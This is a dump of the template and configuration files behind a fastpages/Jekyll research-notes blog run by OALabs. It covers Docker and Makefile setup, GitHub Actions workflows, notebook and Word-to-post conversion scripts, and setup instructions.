31 |
32 | {% endif %}
33 | {% endfor %}
34 | {% endfor %}
35 |
36 | {% endif %}
37 |
--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3"
2 | services:
3 | fastpages: &fastpages
4 | working_dir: /data
5 | environment:
6 | - INPUT_BOOL_SAVE_MARKDOWN=false
7 | build:
8 | context: ./_action_files
9 | dockerfile: ./Dockerfile
10 | image: fastpages-dev
11 | logging:
12 | driver: json-file
13 | options:
14 | max-size: 50m
15 | stdin_open: true
16 | tty: true
17 | volumes:
18 | - .:/data/
19 |
20 | converter:
21 | <<: *fastpages
22 | command: /fastpages/action_entrypoint.sh
23 |
24 | notebook:
25 | <<: *fastpages
26 | command: jupyter notebook --allow-root --no-browser --ip=0.0.0.0 --port=8080 --NotebookApp.token='' --NotebookApp.password=''
27 | ports:
28 | - "8080:8080"
29 |
30 | watcher:
31 | <<: *fastpages
32 | command: watchmedo shell-command --command /fastpages/action_entrypoint.sh --pattern *.ipynb --recursive --drop
33 | network_mode: host # for GitHub Codespaces https://github.com/features/codespaces/
34 |
35 | jekyll:
36 | working_dir: /data
37 | image: fastai/fastpages-jekyll
38 | restart: unless-stopped
39 | ports:
40 | - "4000:4000"
41 | volumes:
42 | - .:/data/
43 | command: >
44 | bash -c "chmod -R u+rw . && jekyll serve --host 0.0.0.0 --trace --strict_front_matter"
45 |
--------------------------------------------------------------------------------
/_fastpages_docs/_upgrade_pr.md:
--------------------------------------------------------------------------------
1 | Hello :wave: @{_username_}!
2 |
3 | This PR pulls the most recent files from [fastpages](https://github.com/fastai/fastpages), and attempts to replace relevant files in your repository, without changing the content of your blog posts. This allows you to receive bug fixes and feature updates.
4 |
5 | ## Warning
6 |
7 | If you have applied **customizations to the HTML or styling of your site, they may be lost if you merge this PR. Please review the changes this PR makes carefully before merging!.** However, for people who only write content and don't change the styling of their site, this method is recommended.
8 |
9 | If you would like more fine-grained control over what changes to accept or decline, consider [following this approach](https://stackoverflow.com/questions/56577184/github-pull-changes-from-a-template-repository/56577320) instead.
10 |
11 | ### What to Expect After Merging This PR
12 |
13 | - GitHub Actions will build your site, which will take 3-4 minutes to complete. **This will happen anytime you push changes to the master branch of your repository.** You can monitor the logs of this if you like on the [Actions tab of your repo](https://github.com/{_username_}/{_repo_name_}/actions).
14 | - You can monitor the status of your site in the GitHub Pages section of your [repository settings](https://github.com/{_username_}/{_repo_name_}/settings).
15 |
--------------------------------------------------------------------------------
/_fastpages_docs/NOTEBOOK_FOOTNOTES.md:
--------------------------------------------------------------------------------
1 | # Detailed Guide To Footnotes in Notebooks
2 |
3 | Notebook -> HTML Footnotes don't work the same as Markdown. There isn't a good solution, so made these Jekyll plugins as a workaround
4 |
5 | ```
6 | This adds a linked superscript {% fn 15 %}
7 |
8 | {{ "This is the actual footnote" | fndetail: 15 }}
9 | ```
10 |
11 | 
12 |
13 | You can have links, but then you have to use **single quotes** to escape the link.
14 | ```
15 | This adds a linked superscript {% fn 20 %}
16 |
17 | {{ 'This is the actual footnote with a [link](www.github.com) as well!' | fndetail: 20 }}
18 | ```
19 | 
20 |
21 | However, what if you want a single quote in your footnote? There is not an easy way to escape that. Fortunately, you can use the special HTML character `'` (you must keep the semicolon!). For example, you can include a single quote like this:
22 |
23 |
24 | ```
25 | This adds a linked superscript {% fn 20 %}
26 |
27 | {{ 'This is the actual footnote; with a [link](www.github.com) as well! and a single quote ' too!' | fndetail: 20 }}
28 | ```
29 |
30 | 
31 |
--------------------------------------------------------------------------------
/_action_files/hide.tpl:
--------------------------------------------------------------------------------
1 | {%- extends 'basic.tpl' -%}
2 |
3 | {% block codecell %}
4 | {{ "{% raw %}" }}
5 | {{ super() }}
6 | {{ "{% endraw %}" }}
7 | {% endblock codecell %}
8 |
9 | {% block input_group -%}
10 | {%- if cell.metadata.collapse_show -%}
11 |
12 |
13 |
41 | {%- else -%}
42 | {{ super() }}
43 | {%- endif -%}
44 | {% endblock output_area_prompt %}
--------------------------------------------------------------------------------
/Gemfile:
--------------------------------------------------------------------------------
1 | source "https://rubygems.org"
2 | # Hello! This is where you manage which Jekyll version is used to run.
3 | # When you want to use a different version, change it below, save the
4 | # file and run `bundle install`. Run Jekyll with `bundle exec`, like so:
5 | #
6 | # bundle exec jekyll serve
7 | #
8 | # This will help ensure the proper Jekyll version is running.
9 | # Happy Jekylling!
10 | gem "jekyll", "~> 4.1.0"
11 | # This is the default theme for new Jekyll sites. You may change this to anything you like.
12 | gem "minima"
13 | # To upgrade, run `bundle update github-pages`.
14 | # gem "github-pages", group: :jekyll_plugins
15 | # If you have any plugins, put them here!
16 | group :jekyll_plugins do
17 | gem "jekyll-feed", "~> 0.12"
18 | gem 'jekyll-octicons'
19 | gem 'jekyll-remote-theme'
20 | gem "jekyll-twitter-plugin"
21 | gem 'jekyll-relative-links'
22 | gem 'jekyll-seo-tag'
23 | gem 'jekyll-toc'
24 | gem 'jekyll-gist'
25 | gem 'jekyll-paginate'
26 | gem 'jekyll-sitemap'
27 | end
28 |
29 | gem "kramdown-math-katex"
30 | gem "jemoji"
31 |
32 | # Windows and JRuby does not include zoneinfo files, so bundle the tzinfo-data gem
33 | # and associated library.
34 | install_if -> { RUBY_PLATFORM =~ %r!mingw|mswin|java! } do
35 | gem "tzinfo", "~> 1.2"
36 | gem "tzinfo-data"
37 | end
38 |
39 | # Performance-booster for watching directories on Windows
40 | gem "wdm", "~> 0.1.1", :install_if => Gem.win_platform?
41 |
42 | gem "faraday", "< 1.0"
43 |
44 |
--------------------------------------------------------------------------------
/_action_files/check_js.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # The purpose of this script is to check parity between official hosted third party js libraries, and alternative CDNs used on this site.
3 |
4 | function compare {
5 | printf "=================\ncomparing:\n%s vs. %s\n" "$1" "$2"
6 | wget "$1" -O f1 &> /dev/null
7 | wget "$2" -O f2 &> /dev/null
8 | if ! cmp f1 f2;
9 | then
10 | printf "Files are NOT the same!\n"
11 | exit 1;
12 | else
13 | printf "Files are the same.\n"
14 | fi
15 | }
16 |
17 | compare "https://unpkg.com/@primer/css/dist/primer.css" "https://cdnjs.cloudflare.com/ajax/libs/Primer/15.2.0/primer.css"
18 | #compare "https://hypothes.is/embed.js" "https://cdn.jsdelivr.net/npm/hypothesis/build/boot.js"
19 | compare "https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/contrib/auto-render.min.js" "https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.12.0/contrib/auto-render.min.js"
20 | compare "https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css" "https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.12.0/katex.min.css"
21 | compare "https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.js" "https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.12.0/katex.min.js"
22 | compare "https://cdn.jsdelivr.net/npm/mathjax@2.7.5/MathJax.js" "https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js"
23 |
24 | # Remove files created for comparison
25 | rm f1 f2
26 |
--------------------------------------------------------------------------------
/_action_files/fast_template.py:
--------------------------------------------------------------------------------
1 | from datetime import datetime
2 | import re, os
3 | from pathlib import Path
4 | from typing import Tuple, Set
5 |
6 | # Check for YYYY-MM-DD
7 | _re_blog_date = re.compile(r'([12]\d{3}-(0[1-9]|1[0-2])-(0[1-9]|[12]\d|3[01])-)')
8 | # Check for leading dashses or numbers
9 | _re_numdash = re.compile(r'(^[-\d]+)')
10 |
11 | def rename_for_jekyll(nb_path: Path, warnings: Set[Tuple[str, str]]=None) -> str:
12 | """
13 | Return a Path's filename string appended with its modified time in YYYY-MM-DD format.
14 | """
15 | assert nb_path.exists(), f'{nb_path} could not be found.'
16 |
17 | # Checks if filename is compliant with Jekyll blog posts
18 | if _re_blog_date.match(nb_path.name): return nb_path.with_suffix('.md').name.replace(' ', '-')
19 |
20 | else:
21 | clean_name = _re_numdash.sub('', nb_path.with_suffix('.md').name).replace(' ', '-')
22 |
23 | # Gets the file's last modified time and and append YYYY-MM-DD- to the beginning of the filename
24 | mdate = os.path.getmtime(nb_path) - 86400 # subtract one day b/c dates in the future break Jekyll
25 | dtnm = datetime.fromtimestamp(mdate).strftime("%Y-%m-%d-") + clean_name
26 | assert _re_blog_date.match(dtnm), f'{dtnm} is not a valid name, filename must be pre-pended with YYYY-MM-DD-'
27 | # push this into a set b/c _nb2htmlfname gets called multiple times per conversion
28 | if warnings: warnings.add((nb_path, dtnm))
29 | return dtnm
30 |
--------------------------------------------------------------------------------
/_action_files/settings.ini:
--------------------------------------------------------------------------------
1 | [DEFAULT]
2 | lib_name = nbdev
3 | user = fastai
4 | branch = master
5 | version = 0.2.10
6 | description = Writing a library entirely in notebooks
7 | keywords = jupyter notebook
8 | author = Sylvain Gugger and Jeremy Howard
9 | author_email = info@fast.ai
10 | baseurl =
11 | title = nbdev
12 | copyright = fast.ai
13 | license = apache2
14 | status = 2
15 | min_python = 3.6
16 | audience = Developers
17 | language = English
18 | requirements = nbformat>=4.4.0 nbconvert>=5.6.1 pyyaml fastscript packaging
19 | console_scripts = nbdev_build_lib=nbdev.cli:nbdev_build_lib
20 | nbdev_update_lib=nbdev.cli:nbdev_update_lib
21 | nbdev_diff_nbs=nbdev.cli:nbdev_diff_nbs
22 | nbdev_test_nbs=nbdev.cli:nbdev_test_nbs
23 | nbdev_build_docs=nbdev.cli:nbdev_build_docs
24 | nbdev_nb2md=nbdev.cli:nbdev_nb2md
25 | nbdev_trust_nbs=nbdev.cli:nbdev_trust_nbs
26 | nbdev_clean_nbs=nbdev.clean:nbdev_clean_nbs
27 | nbdev_read_nbs=nbdev.cli:nbdev_read_nbs
28 | nbdev_fix_merge=nbdev.cli:nbdev_fix_merge
29 | nbdev_install_git_hooks=nbdev.cli:nbdev_install_git_hooks
30 | nbdev_bump_version=nbdev.cli:nbdev_bump_version
31 | nbdev_new=nbdev.cli:nbdev_new
32 | nbdev_detach=nbdev.cli:nbdev_detach
33 | nbs_path = nbs
34 | doc_path = images/copied_from_nb
35 | doc_host = https://nbdev.fast.ai
36 | doc_baseurl = %(baseurl)s/images/copied_from_nb/
37 | git_url = https://github.com/fastai/nbdev/tree/master/
38 | lib_path = nbdev
39 | tst_flags = fastai2
40 | custom_sidebar = False
41 | cell_spacing = 1
42 | monospace_docstrings = False
43 | jekyll_styles = note,warning,tip,important,youtube,twitter
44 |
45 |
--------------------------------------------------------------------------------
/_word/README.md:
--------------------------------------------------------------------------------
1 | # Automatically Convert MS Word (*.docx) Documents To Blog Posts
2 |
3 | _Note: You can convert Google Docs to Word Docs by navigating to the File menu, and selecting Download > Microsoft Word (.docx)_
4 |
5 | [`fastpages`](https://github.com/fastai/fastpages) will automatically convert Word Documents (.docx) saved into this directory as blog posts!. Furthermore, images in your document are saved and displayed as you would expect on your blog post automatically.
6 |
7 | ## Usage
8 |
9 | 1. Create a Word Document (must be .docx) with the contents of your blog post.
10 |
11 | 2. Save your file with the naming convention `YYYY-MM-DD-*.docx` into the `/_word` folder of this repo. For example `2020-01-28-My-First-Post.docx`. This [naming convention is required by Jekyll](https://jekyllrb.com/docs/posts/) to render your blog post.
12 | - Be careful to name your file correctly! It is easy to forget the last dash in `YYYY-MM-DD-`. Furthermore, the character immediately following the dash should only be an alphabetical letter. Examples of valid filenames are:
13 |
14 | ```shell
15 | 2020-01-28-My-First-Post.docx
16 | 2012-09-12-how-to-write-a-blog.docx
17 | ```
18 |
19 | - If you fail to name your file correctly, `fastpages` will automatically attempt to fix the problem by prepending the last modified date of your notebook to your generated blog post. However, it is recommended that you name your files properly yourself for more transparency.
20 |
21 | 3. Synchronize your files with GitHub by [following the instructions in this blog post](https://www.fast.ai/2020/01/18/gitblog/).
22 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | help:
2 | cat Makefile
3 |
4 | # start (or restart) the services
5 | server: .FORCE
6 | docker-compose down --remove-orphans || true;
7 | docker-compose up
8 |
9 | # start (or restart) the services in detached mode
10 | server-detached: .FORCE
11 | docker-compose down || true;
12 | docker-compose up -d
13 |
14 | # build or rebuild the services WITHOUT cache
15 | build: .FORCE
16 | chmod 777 Gemfile.lock
17 | docker-compose stop || true; docker-compose rm || true;
18 | docker build --no-cache -t fastai/fastpages-jekyll -f _action_files/fastpages-jekyll.Dockerfile .
19 | docker-compose build --force-rm --no-cache
20 |
21 | # rebuild the services WITH cache
22 | quick-build: .FORCE
23 | docker-compose stop || true;
24 | docker build -t fastai/fastpages-jekyll -f _action_files/fastpages-jekyll.Dockerfile .
25 | docker-compose build
26 |
27 | # convert word & nb without Jekyll services
28 | convert: .FORCE
29 | docker-compose up converter
30 |
31 | # stop all containers
32 | stop: .FORCE
33 | docker-compose stop
34 | docker ps | grep fastpages | awk '{print $1}' | xargs docker stop
35 |
36 | # remove all containers
37 | remove: .FORCE
38 | docker-compose stop || true; docker-compose rm || true;
39 |
40 | # get shell inside the notebook converter service (Must already be running)
41 | bash-nb: .FORCE
42 | docker-compose exec watcher /bin/bash
43 |
44 | # get shell inside jekyll service (Must already be running)
45 | bash-jekyll: .FORCE
46 | docker-compose exec jekyll /bin/bash
47 |
48 | # restart just the Jekyll server
49 | restart-jekyll: .FORCE
50 | docker-compose restart jekyll
51 |
52 | .FORCE:
53 | chmod -R u+rw .
54 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | [](https://discord.gg/UWdMC3W2qn)
4 | [](https://www.patreon.com/oalabs)
5 |
6 |
7 | [**research.openanalysis.net**](https://research.openanalysis.net)
8 |
9 | # Research Notes
10 |
11 | This is our research notes repository, formerly known as "Lab-Notes". We use [Jupyter Notbooks](https://jupyter.org/) for all of our notes so we can directy include code. The raw notes can be found in this repository in the [_notebooks](https://github.com/OALabs/research/tree/master/_notebooks) directory and our full blog is available online at [research.openanalysis.net](https://research.openanalysis.net).
12 |
13 |
14 | ## How To Add Notes
15 |
16 | Adding a new note is as simple as cloning out repository and launching `juptyer-lab` from the [_notebooks](https://github.com/OALabs/research/tree/master/_notebooks) directory. You can then edit notes, or add new ones.
17 |
18 | The note filename must start with the date in the format `yyyy-mm-dd-` for example `2022-02-22-my_note.ipynb`.
19 |
20 | Each note must include a special markdown cell as the first cell in the notebook. The cell contains the markdown used to generate our blog posts.
21 | ```
22 | # Blog Title
23 | > Blog Subtitle
24 |
25 | - toc: true
26 | - badges: true
27 | - categories: [tagone,tag two]
28 | ```
29 | The blog is generated using fastpages. Full documentation can be found on the [fastpages](https://github.com/fastai/fastpages) GitHub.
30 |
31 |
32 |
--------------------------------------------------------------------------------
/_action_files/word2post.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | # This sets the environment variable when testing locally and not in a GitHub Action
4 | if [ -z "$GITHUB_ACTIONS" ]; then
5 | GITHUB_WORKSPACE='/data'
6 | echo "=== Running Locally: All assets expected to be in the directory /data ==="
7 | fi
8 |
9 | # Loops through directory of *.docx files and converts to markdown
10 | # markdown files are saved in _posts, media assets are saved in assets/img//media
11 | for FILENAME in "${GITHUB_WORKSPACE}"/_word/*.docx; do
12 | [ -e "$FILENAME" ] || continue # skip when glob doesn't match
13 | NAME=${FILENAME##*/} # Get filename without the directory
14 | NEW_NAME=$(python3 "/fastpages/word2post.py" "${FILENAME}") # clean filename to be Jekyll compliant for posts
15 | BASE_NEW_NAME=${NEW_NAME%.md} # Strip the file extension
16 |
17 | if [ -z "$NEW_NAME" ]; then
18 | echo "Unable To Rename: ${FILENAME} to a Jekyll complaint filename for blog posts"
19 | exit 1
20 | fi
21 |
22 | echo "Converting: ${NAME} ---to--- ${NEW_NAME}"
23 | cd ${GITHUB_WORKSPACE} || { echo "Failed to change to Github workspace directory"; exit 1; }
24 | pandoc --from docx --to gfm --output "${GITHUB_WORKSPACE}/_posts/${NEW_NAME}" --columns 9999 \
25 | --extract-media="assets/img/${BASE_NEW_NAME}" --standalone "${FILENAME}"
26 |
27 | # Inject correction to image links in markdown
28 | sed -i.bak 's/!\[\](assets/!\[\]({{ site.url }}{{ site.baseurl }}\/assets/g' "_posts/${NEW_NAME}"
29 | # Remove intermediate files
30 | rm _posts/*.bak 2> /dev/null || true
31 |
32 | cat "${GITHUB_WORKSPACE}/_action_files/word_front_matter.txt" "_posts/${NEW_NAME}" > temp && mv temp "_posts/${NEW_NAME}"
33 | done
34 |
--------------------------------------------------------------------------------
/_action_files/action_entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | set -e
3 |
4 | # setup ssh: allow key to be used without a prompt and start ssh agent
5 | export GIT_SSH_COMMAND="ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
6 | eval "$(ssh-agent -s)"
7 |
8 | ######## Run notebook/word converter ########
9 | # word converter using pandoc
10 | /fastpages/word2post.sh
11 | # notebook converter using nbdev
12 | cp /fastpages/settings.ini .
13 | python /fastpages/nb2post.py
14 |
15 |
16 | ######## Optionally save files and build GitHub Pages ########
17 | if [[ "$INPUT_BOOL_SAVE_MARKDOWN" == "true" ]];then
18 |
19 | if [ -z "$INPUT_SSH_DEPLOY_KEY" ];then
20 | echo "You must set the SSH_DEPLOY_KEY input if BOOL_SAVE_MARKDOWN is set to true.";
21 | exit 1;
22 | fi
23 |
24 | # Get user's email from commit history
25 | if [[ "$GITHUB_EVENT_NAME" == "push" ]];then
26 | USER_EMAIL=$(jq '.commits | .[0] | .author.email' < "$GITHUB_EVENT_PATH")
27 | else
28 | USER_EMAIL="actions@github.com"
29 | fi
30 |
31 | # Setup Git credentials if we are planning to change the data in the repo
32 | git config --global user.name "$GITHUB_ACTOR"
33 | git config --global user.email "$USER_EMAIL"
34 | git remote add fastpages-origin "git@github.com:$GITHUB_REPOSITORY.git"
35 | echo "${INPUT_SSH_DEPLOY_KEY}" > _mykey
36 | chmod 400 _mykey
37 | ssh-add _mykey
38 |
39 | # Optionally save intermediate markdown
40 | if [[ "$INPUT_BOOL_SAVE_MARKDOWN" == "true" ]]; then
41 | git pull fastpages-origin "${GITHUB_REF}" --ff-only
42 | git add _posts
43 | git commit -m "[Bot] Update $INPUT_FORMAT blog posts" --allow-empty
44 | git push fastpages-origin HEAD:"$GITHUB_REF"
45 | fi
46 | fi
47 |
48 |
49 |
--------------------------------------------------------------------------------
/.github/workflows/ci.yaml:
--------------------------------------------------------------------------------
1 | name: CI
2 | on:
3 | push:
4 | branches:
5 | - master # need to filter here so we only deploy when there is a push to master
6 | # no filters on pull requests, so intentionally left blank
7 | pull_request:
8 | workflow_dispatch:
9 |
10 | jobs:
11 | build-site:
12 | if: ( github.event.commits[0].message != 'Initial commit' ) || github.run_number > 1
13 | runs-on: ubuntu-latest
14 | steps:
15 |
16 | - name: Check if secret exists
17 | if: github.event_name == 'push'
18 | run: |
19 | if [ -z "$deploy_key" ]
20 | then
21 | echo "You do not have a secret named SSH_DEPLOY_KEY. This means you did not follow the setup instructions carefully. Please try setting up your repo again with the right secrets."
22 | exit 1;
23 | fi
24 | env:
25 | deploy_key: ${{ secrets.SSH_DEPLOY_KEY }}
26 |
27 |
28 | - name: Copy Repository Contents
29 | uses: actions/checkout@main
30 | with:
31 | persist-credentials: false
32 |
33 | - name: convert notebooks and word docs to posts
34 | uses: ./_action_files
35 |
36 | - name: setup directories for Jekyll build
37 | run: |
38 | rm -rf _site
39 | sudo chmod -R 777 .
40 |
41 | - name: Jekyll build
42 | uses: docker://herrcore/fastpages-jekyll-image
43 | with:
44 | args: bash -c "jekyll build -V --strict_front_matter --trace"
45 | env:
46 | JEKYLL_ENV: 'production'
47 |
48 | - name: copy CNAME file into _site if CNAME exists
49 | run: |
50 | sudo chmod -R 777 _site/
51 | cp CNAME _site/ 2>/dev/null || :
52 |
53 | - name: Deploy
54 | if: github.event_name == 'push'
55 | uses: peaceiris/actions-gh-pages@v3
56 | with:
57 | deploy_key: ${{ secrets.SSH_DEPLOY_KEY }}
58 | publish_dir: ./_site
59 |
--------------------------------------------------------------------------------
/assets/badges/github.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/assets/js/search-data.json:
--------------------------------------------------------------------------------
1 | ---
2 | ---
3 | {
4 | {% assign comma = false %}
5 | {%- assign date_format = site.minima.date_format | default: "%b %-d, %Y" -%}
6 | {% for post in site.posts %}
7 | {% if post.search_exclude != true %}
8 | {% if comma == true%},{% endif %}"post{{ forloop.index0 }}": {
9 | "title": "{{ post.title | replace: '&', '&' }}",
10 | "content": "{{ post.content | markdownify | replace: ' li > div {
87 | box-shadow: none !important;
88 | background-color: $overlay;
89 | border: none !important;
90 | }
91 |
92 | li .post-meta-description {
93 | color: $med-emph !important;
94 | }
95 |
--------------------------------------------------------------------------------
/assets/badges/colab.svg:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/_fastpages_docs/_manual_setup.md:
--------------------------------------------------------------------------------
1 | # Manual Setup Instructions
2 |
3 | These are the setup steps that are automated by [setup.yaml](.github/workflows/setup.yaml)
4 |
5 | 1. Click the [](https://github.com/fastai/fastpages/generate) button to create a copy of this repo in your account.
6 |
7 | 2. [Follow these instructions to create an ssh-deploy key](https://developer.github.com/v3/guides/managing-deploy-keys/#deploy-keys). Make sure you **select Allow write access** when adding this key to your GitHub account.
8 |
9 | 3. [Follow these instructions to upload your deploy key](https://help.github.com/en/actions/configuring-and-managing-workflows/creating-and-storing-encrypted-secrets#creating-encrypted-secrets) as an encrypted secret on GitHub. Make sure you name your key `SSH_DEPLOY_KEY`. Note: The deploy key secret is your **private key** (NOT the public key).
10 |
11 | 4. [Create a branch](https://help.github.com/en/github/collaborating-with-issues-and-pull-requests/creating-and-deleting-branches-within-your-repository#creating-a-branch) named `gh-pages`.
12 |
13 | 5. Change the badges on this README to point to **your** repository instead of `fastai/fastpages`. Badges are organized in a section at the beginning of this README. For example, you should replace `fastai` and `fastpages` in the below url:
14 |
15 | ``
16 |
17 | to
18 |
19 | ``
20 |
21 | 6. Change `baseurl:` in `_config.yaml` to the name of your repository. For example, instead of
22 |
23 | `baseurl: "/fastpages"`
24 |
25 | this should be
26 |
27 | `baseurl: "/your-repo-name"`
28 |
29 | 7. Similarly, change the `url:` parameter in `_config.yaml` to the url your blog will be served on. For example, instead of
30 |
31 | `url: "https://fastpages.fast.ai/"`
32 |
33 | this should be
34 |
35 | `url: "https://.github.io"`
36 |
37 | 8. Read through `_config.yaml` carefully as there may be other options that must be set. The comments in this file will provide instructions.
38 |
39 | 9. Delete the `CNAME` file from the root of your `master` branch (or change it if you are using a custom domain)
40 |
41 | 10. Go to your [repository settings and enable GitHub Pages](https://help.github.com/en/enterprise/2.13/user/articles/configuring-a-publishing-source-for-github-pages) with the `gh-pages` branch you created earlier.
--------------------------------------------------------------------------------
/_layouts/home.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: default
3 | ---
4 |
5 |
--------------------------------------------------------------------------------
/_fastpages_docs/_setup_pr_template.md:
--------------------------------------------------------------------------------
1 | Hello :wave: @OALabs! Thank you for using fastpages!
2 |
3 | ## Before you merge this PR
4 |
5 | 1. Create an ssh key-pair. Open this utility. Select: `RSA` and `4096` and leave `Passphrase` blank. Click the blue button `Generate-SSH-Keys`.
6 |
7 | 2. Navigate to this link and click `New repository secret`. Copy and paste the **Private Key** into the `Value` field. This includes the "---BEGIN RSA PRIVATE KEY---" and "--END RSA PRIVATE KEY---" portions. **In the `Name` field, name the secret `SSH_DEPLOY_KEY`.**
8 |
9 | 3. Navigate to this link and click the `Add deploy key` button. Paste your **Public Key** from step 1 into the `Key` box. In the `Title`, name the key anything you want, for example `fastpages-key`. Finally, **make sure you click the checkbox next to `Allow write access`** (pictured below), and click `Add key` to save the key.
10 |
11 | 
12 |
13 |
14 | ### What to Expect After Merging This PR
15 |
16 | - GitHub Actions will build your site, which will take 2-3 minutes to complete. **This will happen anytime you push changes to the master branch of your repository.** You can monitor the logs of this if you like on the [Actions tab of your repo](https://github.com/OALabs/research/actions).
17 | - Your GH-Pages Status badge on your README will eventually appear and be green, indicating your first successful build.
18 | - You can monitor the status of your site in the GitHub Pages section of your [repository settings](https://github.com/OALabs/research/settings).
19 |
20 | If you are not using a custom domain, your website will appear at:
21 |
22 | #### https://OALabs.github.io/research
23 |
24 |
25 | ## Optional: Using a Custom Domain
26 |
27 | 1. After merging this PR, add a file named `CNAME` at the root of your repo. For example, the `fastpages` blog is hosted at `https://fastpages.fast.ai`, which means [our CNAME](https://github.com/fastai/fastpages/blob/master/CNAME) contains the following contents:
28 |
29 |
30 | >`fastpages.fast.ai`
31 |
32 |
33 | 2. Change the `url` and `baseurl` parameters in your `/_config.yml` file to reflect your custom domain.
34 |
35 |
36 | Wondering how to setup a custom domain? See [this article](https://dev.to/trentyang/how-to-setup-google-domain-for-github-pages-1p58). You must add a CNAME file to the root of your master branch for the intructions in the article to work correctly.
37 |
38 |
39 | ## Questions
40 |
41 | Please use the [nbdev & blogging channel](https://forums.fast.ai/c/fastai-users/nbdev/48) in the fastai forums for any questions or feature requests.
42 |
--------------------------------------------------------------------------------
/assets/badges/binder.svg:
--------------------------------------------------------------------------------
1 | launchlaunchbinderbinder
--------------------------------------------------------------------------------
/.github/workflows/check_config.yaml:
--------------------------------------------------------------------------------
1 | name: Check Configurations
2 | on: push
3 |
4 | jobs:
5 | check-config:
6 | runs-on: ubuntu-latest
7 | steps:
8 | - uses: actions/checkout@main
9 |
10 | - name: Set up Python
11 | uses: actions/setup-python@v1
12 | with:
13 | python-version: 3.7
14 |
15 | - name: install dependencies
16 | run: pip3 install pyyaml
17 |
18 | - name: check baseurl
19 | id: baseurl
20 | run: |
21 | import yaml
22 | from pathlib import Path
23 | from configparser import ConfigParser
24 | settings = ConfigParser()
25 |
26 | config_path = Path('_config.yml')
27 | settings_path = Path('_action_files/settings.ini')
28 |
29 | assert config_path.exists(), 'Did not find _config.yml in the current directory!'
30 | assert settings_path.exists(), 'Did not find _action_files/settings.ini in the current directory!'
31 |
32 | settings.read(settings_path)
33 | with open('_config.yml') as f:
34 | config = yaml.safe_load(f)
35 |
36 | errmsg = f"The value set for baseurl in _action_files/settings.ini and _config.yml are not identical. Please fix and try again."
37 | assert config['baseurl'] == settings['DEFAULT']['baseurl'], errmsg
38 | shell: python
39 |
40 | - name: Create issue if baseurl rule is violated
41 | if: steps.baseurl.outcome == 'failure'
42 | uses: actions/github-script@0.6.0
43 | with:
44 | github-token: ${{secrets.GITHUB_TOKEN}}
45 | script: |
46 | var err = process.env.ERROR_STRING;
47 | var run_id = process.env.RUN_ID;
48 | github.issues.create({
49 | owner: context.repo.owner,
50 | repo: context.repo.repo,
51 | title: "Error with repository configuration: baseurl",
52 | body: `${err}\n See run [${run_id}](https://github.com/${context.repo.owner}/${context.repo.repo}/actions/runs/${run_id}) for more details.`
53 | })
54 | env:
55 | ERROR_STRING: "You have not configured your baseurl correctly, please read the instructions in _config.yml carefully."
56 | RUN_ID: ${{ github.run_id }}
57 |
58 | - name: check for User Pages
59 | id: userpage
60 | run: |
61 | import os
62 | nwo = os.getenv('GITHUB_REPOSITORY')
63 | errmsg = "fastpages does not support User Pages or repo names that end with github.io, please see https://forums.fast.ai/t/fastpages-replacing-main-username-github-io-page-w-fastpages/64316/3 for more details."
64 | assert ".github.io" not in nwo, errmsg
65 | shell: python
66 |
67 | - name: Create Issue if User Pages rule is violated
68 | if: steps.userpage.outcome == 'failure'
69 | uses: actions/github-script@0.6.0
70 | with:
71 | github-token: ${{secrets.GITHUB_TOKEN}}
72 | script: |
73 | github.issues.create({
74 | owner: context.repo.owner,
75 | repo: context.repo.repo,
76 | title: "Error with repository configuration: repo name",
77 | body: 'fastpages does not support User Pages or repo names that end with github.io, please see https://forums.fast.ai/t/fastpages-replacing-main-username-github-io-page-w-fastpages/64316/3 for more details.'
78 | })
79 |
--------------------------------------------------------------------------------
/_includes/custom-head.html:
--------------------------------------------------------------------------------
1 | {% comment %}
2 | Placeholder to allow defining custom head, in principle, you can add anything here, e.g. favicons:
3 |
4 | 1. Head over to https://realfavicongenerator.net/ to add your own favicons.
5 | 2. Customize default _includes/custom-head.html in your source directory and insert the given code snippet.
6 | {% endcomment %}
7 |
8 |
9 | {%- include favicons.html -%}
10 |
11 |
12 |
13 | {%- if site.annotations -%}
14 |
15 | {%- endif -%}
16 |
17 | {% if site.use_math %}
18 |
19 |
20 |
21 |
22 |
33 | {% endif %}
34 |
35 |
56 |
57 |
64 |
--------------------------------------------------------------------------------
/_fastpages_docs/README_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | [//]: # (This template replaces README.md when someone creates a new repo with the fastpages template.)
2 |
3 | 
4 | 
5 | [](https://github.com/fastai/fastpages)
6 |
7 | https://{_username_}.github.io/{_repo_name_}/
8 |
9 | # My Blog
10 |
11 |
12 | _powered by [fastpages](https://github.com/fastai/fastpages)_
13 |
14 |
15 | ## What To Do Next?
16 |
17 | Great! You have setup your repo. Now its time to start writing content. Some helpful links:
18 |
19 | - [Writing Blogs With Jupyter](https://github.com/fastai/fastpages#writing-blog-posts-with-jupyter)
20 |
21 | - [Writing Blogs With Markdown](https://github.com/fastai/fastpages#writing-blog-posts-with-markdown)
22 |
23 | - [Writing Blog Posts With Word](https://github.com/fastai/fastpages#writing-blog-posts-with-microsoft-word)
24 |
25 | - [(Optional) Preview Your Blog Locally](_fastpages_docs/DEVELOPMENT.md)
26 |
27 | Note: you may want to remove example blog posts from the `_posts`, `_notebooks` or `_word` folders (but leave them empty, don't delete these folders) if you don't want these blog posts to appear on your site.
28 |
29 | Please use the [nbdev & blogging channel](https://forums.fast.ai/c/fastai-users/nbdev/48) in the fastai forums for any questions or feature requests.
